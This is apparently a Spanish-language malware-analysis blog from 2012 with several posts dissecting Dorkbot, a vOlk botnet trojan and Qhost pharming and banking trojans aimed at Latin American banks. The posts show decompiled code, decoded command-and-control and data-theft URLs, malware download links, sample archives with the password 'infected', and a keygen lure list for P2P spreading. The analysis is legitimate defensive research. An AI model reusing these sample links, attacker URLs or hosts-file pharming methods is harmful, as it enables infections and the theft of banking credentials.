martes, 12 de junio de 2012

Dorkbot - Pineda Pedofilo y Gay.


  Un nuevo intento de atrapar incautos utilizando ingeniería social, la verdad no salgo de mi asombro...










Primera capa de UPX modificado.






C:\Program Files\Common Files\drlwszvxbeo.exe

DNS Query Text
api.wipmania.com IN A +
6699x.in IN A +
• HTTP Queries
HTTP Query Text
api.wipmania.com GET / HTTP/1.1

Análisis de Comodo.

http://camas.comodo.com/cgi-bin/submit?file=f246dde25ca8020e118308d5a436349c9484814fea3467689d40e50174a77d4c


GET / HTTP/1.1

User-Agent: Mozilla/4.0
Host: api.wipmania.com


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Jun 2012 18:30:45 GMT
Content-Type: text/html
Content-Length: 17
Connection: close
Set-Cookie: uid=xw/qB0/WOVU+onp/EwtHAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.wipmania.com; path=/


80.13.75.21
FR

Dumpeado con Ollydbg.






Aquí vemos como DorkBot infecta una unidad USB, crea una carpeta Recycled dentro de ella coloca una copia del troyano, luego oculta las carpetas que tengamos en la unidad usb, y creara accesos directos al troyano con el mismo nombre que nuestras carpetas.









Muestra: http://www.mediafire.com/?7spi4c3zaoktmgt




Podan encontrar el binario original, el binario sin UPX y el dump.




Es todo por el momento.




@Dkavalance    2012

lunes, 11 de junio de 2012

Premio LAN - Troyano vOlk Botnet




Otro troyano de la familia vOlk enviado como un falso premio de la Aerolínea LAN.





Icono.


Análisis en VT




El malware esta ofuscado con un VBCrypt.








Aquí desempaquetado, nos descubre un programa compilado en Visual Basic.




Visualización de los C&C




c_40958D: LitVarStr var_BC, "Zombies.php?iName="
  loc_409592: AddVar var_CC
  loc_409596: LitVarStr var_DC, "USERNAME"
  loc_40959B: FStVarCopyObj var_EC
  loc_40959E: FLdRfVar var_EC
  loc_4095A1: FLdRfVar var_FC
  loc_4095A4: ImpAdCallFPR4 Environ
  loc_4095A9: FLdRfVar var_FC
  loc_4095AC: AddVar var_10C
  loc_4095B0: LitI4 &H2D
  loc_4095B5: FLdRfVar var_11C
  loc_4095B8: ImpAdCallFPR4 arg_1 = arg_3 & Chr(arg_2)
  loc_4095BD: FLdRfVar var_11C
  loc_4095C0: ConcatVar var_12C
  loc_4095C4: LitVarStr var_13C, "COMPUTERNAME"




Como se conectara:

http://xxxxxx.com/System/Zombies.php



Nos conectamos a unos de los servidores C&C y pasando el user agent, que esta en el cuerpo del troyano, nos dará los sitios de pharming





User-Agent.

c_4091C1: LitStr "QfH205c3Msk2+mAVLjb6Tgb6S4/9QfPqblc5LDgsSIQuQfPq05c3MsgsS2J6S41zKiT=+iHNMiTaOxu60/CC"


Sitios de Pharming:







Algunas cadenas interesantes, con la intención de infectar recursos compartidos p2p.

 LitStr "Spread USB/P2P Successful"

c_40A946: LitStr "Adobe Acrobat 9 Keygen, Adobe Photoshop CS4 Keygen, Adobe Photoshop CS5 Keygen"
  loc_40A949: LitStr "Adobe Photoshop CS5 Extended Keygen, Adobe Photoshop Elements 9.0 Keygen"
  loc_40A94C: ConcatStr
  loc_40A94D: FStStrNoPop var_D0
  loc_40A950: LitStr "Aiseesoft DVD Ripper 5.0.22-Lz0 Keygen,Aiseesoft Total Video Converter (v5.1.1.10) Keygen"
  loc_40A953: ConcatStr
  loc_40A954: FStStrNoPop var_D4
  loc_40A957: LitStr "Akvis ArtSuite 6.5.2121 Keygen,WinRAR 3.93 Keygen,Virtual DJ Home 7.0 Keygen"
  loc_40A95A: ConcatStr
  loc_40A95B: FStStrNoPop var_D8
  loc_40A95E: LitStr "Alcohol 120" & Chr(37) & " 1.9.8.7612,Alcohol 120" & Chr(37) & " 2.0.1.2033,AnyDVD HD 6.6.0.3 Keygen"
  loc_40A961: ConcatStr
  loc_40A962: FStStrNoPop var_DC
  loc_40A965: LitStr "Patch Windows 7,Aqualux Deluxe Keygen,Microsoft Office 2007 Professional Keygen "
  loc_40A968: ConcatStr
  loc_40A969: FStStrNoPop var_E0
  loc_40A96C: LitStr "Malwarebytes Anti-Malware Keygen,Ashampoo Burning Studio Keygen,Ashampoo Movie Menu Keygen"
  loc_40A96F: ConcatStr
  loc_40A970: FStStrNoPop var_F4
  loc_40A973: LitStr "Assasins Creed 2 (2010),Ashampoo Snap 4 4.1 Keygen,TuneUp Utilities Keygen ,Audio Edit Magic 7.6.0.34 Keygen"
  loc_40A976: ConcatStr
  loc_40A977: FStStrNoPop var_F8
  loc_40A97A: LitStr "Auto Hide IP Keygen,Autodesk AutoCAD 2010 Keygen,Autodesk Mudbox 2011 (x64)Keygen,Autodesk Maya Unlimited 2011"
  loc_40A97D: ConcatStr
  loc_40A97E: FStStrNoPop var_FC
  loc_40A981: LitStr "Autodesk Sketchbook Designer 2011 Keygen,Internet Download Manager 5.19 Keygen,AV Voice Changer Gold 7.0.22"
  loc_40A984: ConcatStr
  loc_40A985: FStStrNoPop var_100
  loc_40A988: LitStr "Avast AntiVirus 4 8,Avast Internet Security 5.0.545 Keygen,Avast! Pro Antivirus 5.0.677 Keygen"
  loc_40A98B: ConcatStr
  loc_40A98C: FStStrNoPop var_104
  loc_40A98F: LitStr "Nero 9 Reloaded (9.4.26.0,AVG Anti-Virus Free Edition 2011,AVG Anti-Virus Pro 9.0 Keygen"
  loc_40A992: ConcatStr
  loc_40A993: FStStrNoPop var_108
  loc_40A996: LitStr "AVG Internet Security 2011 Keygen,Kaspersky All version Activation Key"
  loc_40A999: ConcatStr
  loc_40A99A: FStStrNoPop var_10C
  loc_40A99D: LitStr "AVG PC Tuneup 2011 10.0.0.20,Hex Workshop v6 Keygen,HyperCam 2 Full Keygen"
  loc_40A9A0: ConcatStr
  loc_40A9A1: FStStrNoPop var_110
  loc_40A9A4: LitStr "Avira AntiVir Premium 10.0.0.601 Keygen,Nero Multimedia Suite 10.0.13200 Keygen"
  loc_40A9A7: ConcatStr
  loc_40A9A8: FStStrNoPop var_114
  loc_40A9AB: LitStr "Award Keylogger 1.30 (x86-x64),Backgammon HD 1.4.0 (iPhone),Battlefield 2 (2010)"
  loc_40A9AE: ConcatStr
  loc_40A9AF: FStStrNoPop var_118
  loc_40A9B2: LitStr "BitTorrent 7.1.22502 (Portable),Blu-ray to DVD II Pro 2.80 Keygen,Call of Duty Patch"
  loc_40A9B5: ConcatStr
  loc_40A9B6: FStStrNoPop var_11C
  loc_40A9B9: LitStr "Call of Duty 4 Modern Warfare Patch,Call of Juarez Bound In Blood Patch,Camtasia Studio 7.1.0.1631"
  loc_40A9BC: ConcatStr
  loc_40A9BD: FStStrNoPop var_120
  loc_40A9C0: LitStr "Convert Genius 3.6.0.36 Keygen,WinZip 14.0.8708  Keygen,CorelDraw 10.412"
  loc_40A9C3: ConcatStr
  loc_40A9C4: FStStrNoPop var_124
  loc_40A9C7: LitStr "CorelDRAW 10 10.410 Keygen,CorelDraw Graphics Suite X3 Keygen,Counter Strike 1.6"
  loc_40A9CA: ConcatStr
  loc_40A9CB: FStStrNoPop var_128
  loc_40A9CE: LitStr "Counter Strike 1.6 Non Steam Patch,Counter Strike Source Patch,Kaspersky Internet Security Keygen"







Muestra con y sin pack. :http://www.mediafire.com/?cbjy7tu9935kft5




Add:



Aquí esta el panel de la Botnet.







Eso es todo por el momento.

@Dkavalanche            2012



sábado, 9 de junio de 2012

Qhost VI -  Pamela ha elegido una tarjeta para ti, en Terra.


Otro simple troyano que modifica el archivo host de la PC para hacer pharming y enviar a las victimas a un sitio de phishng, Esta vez, afecta a varias entidades bancarias de Chile  y Colombia, sumado a Hotmail y Gmail.






Link: hxxp://www.foresthousebaguio.com/tride/Imagenes/OpenSSL/Metro/id=143V10.exe

Análisis en VT.




Encontramos una cadenas en hexa, por lo que imagino que debe ser la configuración.




La pasamos a texto....y podemos observar la url donde ira a buscar la configuración para modificar el archivo host.














Eso es todo por el momento.



@Dkavalanche    2012

miércoles, 6 de junio de 2012

Troyano de Formulario III, Falso Comprobante de deposito.


En el día de hoy como en otra ocasión, volvieron a la carga con la ingeniería social, aplicada a un falso comprobante de deposito.


Correo enviado a las victimas.






El link nos lleva a un Url y luego nos redirige a otra Url donde nos descarga un archivo ejecutable con un icono de una carpeta.











El Análisis de VT nos arroja un indice bajo de detecciones.






El análisis en comodo nos reporta que intenta descargar un archivo .gif que en realidad se trata de un ejecutable. Por lo que se trata de un Dowloader.



Este downloader esta empaquetado con UPX y compilado con Delphi.






Archivo que intenta descargar:
www.rafaelrosa.com.br/rafaelrosa/fotos/1/1/100_g.jpg1/a.gif






Le cambiamos la extensión a .exe y lo subimos a VT.


El ejecutable no tiene Packer y esta compilado en Delphi 2010






Estos son algunos de los formularios desplegados por esta amenaza.










Pedido de Tarjeta de Coordenadas. 

Y pensar que hay gente que carga todos los datos....








Afecta a seis entidades Bancarias Argentinas






Manera en que serán enviados y presentados los datos al estafador.

















El troyano tiene las siguientes cadenas:


AD4F965A86F2110B3294C67FAE2B68F666A692F763D154BFDA3B3F3E2FCB679FFB1537E2162ECDAC56F82160F527DD00639332CB65CD6CEC2E15CF6A943B5A8F34E1
9A5A9B41FD0A0A72EF1A7DEF67AED355CE342867D2462F6AFF47F72CE11BD74B9842F129CB6583A29984A92DDC





Las cuales se encuentran codificadas y realmente indican las Urls donde serán enviados los datos robados.






Decodificadas:

http://static-98-141-57-164.dsl.cavtel.net/TrioWorks/mix/post.asp
http://184.105.229.146/_privat/contador2.asp









muestra en : http://www.mediafire.com/?ti4e159863r3eni


Password = infected






Eso es todo por el momento.




@DkAvalanche  2012



lunes, 4 de junio de 2012

Qhost: Analizando codificación de datos con Cryptool.


Ayer me enviaron para analizar el siguiente correo fraudulento, que descarga
un .zip que contiene un archivo .SCR






Link del malware hxxp://superteacheronline.com/extras/X/Mensaje_Multimedia(MMS).zip


Analizado en VT este ejecutable tiene un indice de 0/42










Analizando este .SCR encuentro que se trata de una utilidad para realizar instalaciones, por lo que este ejecutable en su interior contiene un .ZIP con otro ejecutable llamado FlashPlayer.exe 




Analizado el .exe con VT vemos que tiene un indice de 1/40 detecciones.




Este ejecutable esta programado en Vbasic 6, por lo que echaremos mano al Vbdecompiler.


En el código encontramos cosas como:


  loc_405C8D: LitI4 &H5C
  loc_405C92: ImpAdCallI2 Chr$(arg_1)
  loc_405C97: FStStrNoPop var_90
  loc_405C9A: ConcatStr
  loc_405C9B: FStStrNoPop var_94
  loc_405C9E: LitI4 &H73
  loc_405CA3: ImpAdCallI2 Chr$(arg_1)
  loc_405CA8: FStStrNoPop var_98
  loc_405CAB: ConcatStr
  loc_405CAC: FStStrNoPop var_9C
  loc_405CAF: LitI4 &H79
  loc_405CB4: ImpAdCallI2 Chr$(arg_1)
  loc_405CB9: FStStrNoPop var_A0
  loc_405CBC: ConcatStr
  loc_405CBD: FStStrNoPop var_A4
  loc_405CC0: LitI4 &H73
  loc_405CC5: ImpAdCallI2 Chr$(arg_1)
  loc_405CCA: FStStrNoPop var_A8
  loc_405CCD: ConcatStr
  loc_405CCE: FStStrNoPop var_AC
  loc_405CD1: LitI4 &H74
  loc_405CD6: ImpAdCallI2 Chr$(arg_1)
  loc_405CDB: FStStrNoPop var_B0
  loc_405CDE: ConcatStr
  loc_405CDF: FStStrNoPop var_B4
  loc_405CE2: LitI4 &H65
  loc_405CE7: ImpAdCallI2 Chr$(arg_1)
  loc_405CEC: FStStrNoPop var_D8
  loc_405CEF: ConcatStr
  loc_405CF0: FStStrNoPop var_DC
  loc_405CF3: LitI4 &H6D
  loc_405CF8: ImpAdCallI2 Chr$(arg_1)
  loc_405CFD: FStStrNoPop var_E0
  loc_405D00: ConcatStr
  loc_405D01: FStStrNoPop var_E4
  loc_405D04: LitI4 &H33
  loc_405D09: ImpAdCallI2 Chr$(arg_1)
  loc_405D0E: FStStrNoPop var_E8
  loc_405D11: ConcatStr
  loc_405D12: FStStrNoPop var_EC
  loc_405D15: LitI4 &H32
  loc_405D1A: ImpAdCallI2 Chr$(arg_1)
  loc_405D1F: FStStrNoPop var_F0
  loc_405D22: ConcatStr
  loc_405D23: FStStrNoPop var_F4
  loc_405D26: LitI4 &H5C
  loc_405D2B: ImpAdCallI2 Chr$(arg_1)
  loc_405D30: FStStrNoPop var_F8
  loc_405D33: ConcatStr
  loc_405D34: FStStrNoPop var_FC
  loc_405D37: LitI4 &H64
  loc_405D3C: ImpAdCallI2 Chr$(arg_1)
  loc_405D41: FStStrNoPop var_100
  loc_405D44: ConcatStr
  loc_405D45: FStStrNoPop var_104
  loc_405D48: LitI4 &H72
  loc_405D4D: ImpAdCallI2 Chr$(arg_1)
  loc_405D52: FStStrNoPop var_108
  loc_405D55: ConcatStr
  loc_405D56: FStStrNoPop var_10C
  loc_405D59: LitI4 &H69
  loc_405D5E: ImpAdCallI2 Chr$(arg_1)
  loc_405D63: FStStrNoPop var_110
  loc_405D66: ConcatStr
  loc_405D67: FStStrNoPop var_114
  loc_405D6A: LitI4 &H76
  loc_405D6F: ImpAdCallI2 Chr$(arg_1)
  loc_405D74: FStStrNoPop var_118
  loc_405D77: ConcatStr
  loc_405D78: FStStrNoPop var_11C
  loc_405D7B: LitI4 &H65
  loc_405D80: ImpAdCallI2 Chr$(arg_1)
  loc_405D85: FStStrNoPop var_120
  loc_405D88: ConcatStr
  loc_405D89: FStStrNoPop var_124
  loc_405D8C: LitI4 &H72
  loc_405D91: ImpAdCallI2 Chr$(arg_1)
  loc_405D96: FStStrNoPop var_128
  loc_405D99: ConcatStr
  loc_405D9A: FStStrNoPop var_12C
  loc_405D9D: LitI4 &H73
  loc_405DA2: ImpAdCallI2 Chr$(arg_1)
  loc_405DA7: FStStrNoPop var_130
  loc_405DAA: ConcatStr
  loc_405DAB: FStStrNoPop var_134
  loc_405DAE: LitI4 &H5C
  loc_405DB3: ImpAdCallI2 Chr$(arg_1)
  loc_405DB8: FStStrNoPop var_138
  loc_405DBB: ConcatStr
  loc_405DBC: FStStrNoPop var_13C
  loc_405DBF: LitI4 &H65
  loc_405DC4: ImpAdCallI2 Chr$(arg_1)
  loc_405DC9: FStStrNoPop var_140
  loc_405DCC: ConcatStr
  loc_405DCD: FStStrNoPop var_144
  loc_405DD0: LitI4 &H74
  loc_405DD5: ImpAdCallI2 Chr$(arg_1)
  loc_405DDA: FStStrNoPop var_148
  loc_405DDD: ConcatStr
  loc_405DDE: FStStrNoPop var_14C
  loc_405DE1: LitI4 &H63
  loc_405DE6: ImpAdCallI2 Chr$(arg_1)
  loc_405DEB: FStStrNoPop var_150
  loc_405DEE: ConcatStr
  loc_405DEF: FStStrNoPop var_154
  loc_405DF2: LitI4 &H5C
  loc_405DF7: ImpAdCallI2 Chr$(arg_1)
  loc_405DFC: FStStrNoPop var_158
  loc_405DFF: ConcatStr
  loc_405E00: FStStrNoPop var_15C
  loc_405E03: LitI4 &H68
  loc_405E08: ImpAdCallI2 Chr$(arg_1)
  loc_405E0D: FStStrNoPop var_160
  loc_405E10: ConcatStr
  loc_405E11: FStStrNoPop var_164
  loc_405E14: LitI4 &H6F
  loc_405E19: ImpAdCallI2 Chr$(arg_1)
  loc_405E1E: FStStrNoPop var_168
  loc_405E21: ConcatStr
  loc_405E22: FStStrNoPop var_16C
  loc_405E25: LitI4 &H73
  loc_405E2A: ImpAdCallI2 Chr$(arg_1)
  loc_405E2F: FStStrNoPop var_170
  loc_405E32: ConcatStr
  loc_405E33: FStStrNoPop var_174
  loc_405E36: LitI4 &H74
  loc_405E3B: ImpAdCallI2 Chr$(arg_1)
  loc_405E40: FStStrNoPop var_178
  loc_405E43: ConcatStr
  loc_405E44: FStStrNoPop var_17C
  loc_405E47: LitI4 &H73      



Si unimos todos los valores Hex nos queda

         5c73797374656d33325c647269766572735c6574635c686f737473

Pasado a Texto nos queda la cadena: \system32\drivers\etc\hosts





Otra cadena disimulada entra las variables:

  loc_406059: LitStr "H"
  loc_40606C: LitStr "K"
  loc_40607B: LitStr "E"
  loc_4060AA: LitStr "Y"
  loc_4060B9: LitStr "_"
  loc_4060D0: LitStr "L"
  loc_4060E7: LitStr "O"
  loc_40611E: LitStr "C"
  loc_406145: LitStr "A"
  loc_406164: LitStr "L"
  loc_40617B: LitStr "_"
  loc_406192: LitStr "M"
  loc_4061A9: LitStr "A"
  loc_4061C8: LitStr "C"
  loc_4061EF: LitStr "H"
  loc_406206: LitStr "I"
  loc_40622D: LitStr "N"
  loc_40625C: LitStr "E"
  loc_40628B: LitStr "\"
  loc_4062EA: LitStr "S"
  loc_406311: LitStr "O"
  loc_406348: LitStr "F"
  loc_40637E: LitStr "W"
  loc_40639D: LitStr "A"
  loc_4063BC: LitStr "R"
  loc_4063F3: LitStr "E"
  loc_406422: LitStr "\"
  loc_406481: LitStr "M"
  loc_406498: LitStr "I"
  loc_4064BF: LitStr "C"
  loc_4064E6: LitStr "R"
  loc_40651D: LitStr "O"
  loc_406554: LitStr "S"
  loc_40657B: LitStr "O"
  loc_4065B2: LitStr "F"
  loc_4065C9: LitStr "T"
  loc_4065E8: LitStr "\"
  loc_406647: LitStr "W"
  loc_406666: LitStr "I"
  loc_40668D: LitStr "N"
  loc_4066BC: LitStr "D"
  loc_4066CB: LitStr "O"
  loc_406702: LitStr "W"
  loc_406721: LitStr "S"
  loc_406748: LitStr "\"
  loc_4067A7: LitStr "C"
  loc_4067CE: LitStr "U"
  loc_4067E5: LitStr "R"
  loc_40681C: LitStr "R"
  loc_406853: LitStr "E"
  loc_406882: LitStr "N"
  loc_4068B1: LitStr "T"
  loc_4068D0: LitStr "V"
  loc_4068DF: LitStr "E"
  loc_40690E: LitStr "R"
  loc_406945: LitStr "S"
  loc_40696C: LitStr "I"
  loc_406993: LitStr "O"
  loc_4069CA: LitStr "N"
  loc_4069F9: LitStr "\"
  loc_406A58: LitStr "R"
  loc_406A8F: LitStr "U"
  loc_406AA6: LitStr "N"
  loc_406AD5: LitStr "\"
  loc_406B30: ConcatStr
  loc_406B31: FStStr var_88



LitI4 &H57
LitI4 &H73
LitI4 &H63
LitI4 &H72
LitI4 &H69
LitI4 &H70
LitI4 &H74
LitI4 &H2E
LitI4 &H73
LitI4 &H68
LitI4 &H65
LitI4 &H6C
LitI4 &H6C
LitI4 &H41
LitI4 &H70
LitI4 &H70
LitI4 &H2E
LitI4 &H45
LitI4 &H58
LitI4 &H45
LitI4 &H4E
LitI4 &H61
LitI4 &H6D
LitI4 &H65

577363726970742E7368656C6C4170702E4558454E616D65

Wscript.shellApp.EXEName



Utilización de la función StrReverse




  loc_405623: FLdRfVar var_98
  loc_405626: LitStr "exe.dnuos\metsys\"
  loc_405629: ImpAdCallI2 StrReverse

Queda como resultado del StrReverse : /system/sound.exe




Private Sub C0NF1GUR4C10N_Click() '40581C

  loc_405560: LitStr "/bmuht/ni.ecilagel//:ptth"
  loc_405563: ImpAdCallI2 StrReverse


http://legalice.in/thumb

Sitio donde toma la configuración para realizar el pharming modificando el etc/host





Con la siguiente rutina armara la URL donde buscara la configuracion:

Private Sub B0_T0_N1_Click() '4045F8
  'Data Table: 402044
  loc_4045A0: ImpAdCallFPR4 Proc_3_1_404F74()
  loc_4045A5: FLdPr Me
  loc_4045A8: MemLdStr global_80
  loc_4045AB: LitStr "_bmuht"                  <---- thumb_
  loc_4045AE: ImpAdCallI2 StrReverse
  loc_4045B3: FStStrNoPop var_88
  loc_4045B6: ConcatStr
  loc_4045B7: FStStrNoPop var_8C
  loc_4045BA: ImpAdLdI4 MemVar_408030          <---  thumb_ + MemVar_408030   
  loc_4045BD: ConcatStr
  loc_4045BE: FStStrNoPop var_90
  loc_4045C1: LitStr "gpj."                    <--- .jpg
  loc_4045C4: ImpAdCallI2 StrReverse
  loc_4045C9: FStStrNoPop var_94
  loc_4045CC: ConcatStr
  loc_4045CD: CVarStr var_A4
  loc_4045D0: PopAdLdVar
  loc_4045D1: FLdPrThis
  loc_4045D2: VCallAd M0_d0_l0
  loc_4045D5: FStAdFunc var_B8
  loc_4045D8: FLdPr var_B8
  loc_4045DB: LateIdCall
  loc_4045E3: FFreeStr var_88 = "": var_8C = "": var_90 = "" = ""
  loc_4045EE: FFree1Ad var_B8
  loc_4045F1: FFree1Var var_A4 = ""
  loc_4045F4: ExitProcHresult
End Sub


Queda: http://legalice.in/thumb/thumb_38BA2BE7.jpg

 MemVar_408030  es un valor en hexa (38BA2BE7) que va variando y no modifica la URL mostrada.



Si consultamos esta URL, en malzilla el servidor nos mostrara:


HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 813
Connection: close
Date: Mon, 04 Jun 2012 20:39:08 GMT
Server: LiteSpeed
X-Powered-By: PHP/5.3.10

*'Jvw.ypno{'/j0'8@@:48@@@'Tpjyvzvm{'Jvyw5..*..*'.z{l'lz'|u'lqltwsv'kl'hyjop}v'OVZ[Z'|zhkv'wvy'Tpjyvzvm{'[JW6PW'whyh'^pukv~z5..*..*'Lz{l'hyjop}v'jvu{plul'shz'hzpnuhjpvulz'kl'shz'kpyljjpvulz'PW'h'svz'uvtiylz'kl..*'ovz{5'Jhkh'lu{yhkh'klil'wlythuljly'lu'|uh's.ulh'pukp}pk|hs5'Sh'kpyljjp.u'PW..*'klil'wvulyzl'lu'sh'wyptlyh'jvs|tuh3'zln|pkh'kls'uvtiyl'kl'ovz{'jvyylzwvukplu{l5..*'Sh'kpyljjp.u'PW'.'ls'uvtiyl'kl'ovz{'klilu'zlwhyhyzl'jvu'hs'tluvz'|u'lzwhjpv5..*'..*..*'[htip.u'w|lklu'puzly{hyzl'jvtlu{hypvz'/jvtv'.z{l0'lu's.ulhz'pukp}pk|hslz..*'v'h'jvu{pu|hjp.u'kls'uvtiyl'kl'lx|pwv'pukpj.ukvsvz'jvu'ls'z.tivsv'*..*..*'Wvy'lqltwsvA..*..*''''''8795<;5@;5@>'''''yopuv5hjtl5jvt''''''''''*'zly}pkvy'vypnlu..*''''''':?59<5=:587'''''5hjtl5jvt''''''''''''''*'ovz{'jsplu{l'....89>575758'''''''svjhsovz{



Por lo que deduzco que todo lo que esta dentro de Iniciop y Finp es el archivo .HOST que sera guardado en la PC de la victima.


Aquí donde utilizaremos la herramienta Cryptool




Primero cargamos el texto comprendido entre Inicio y Fin


Luego

Análisis -> Cifrado Simétrico (Clasico) -> Solo Texto Cifrado -> Suma de Bytes





El análisis nos indica que la clave con suma de bytes es 27.............



Y................................................... Listo....................






Parece que el sitio de pharming todavía no fue cargado por el defraudador.



Pueden descargar la amenaza y el de-compilado .bas desde


Pass = infected

Eso es todo por el momento.


@DkAvalanche   2012







Android: BankBot. Hace un tiempo se filtro el fuente de un Bankbo t para android y se masifico bastante, creo que muchos lo han lanzado pa...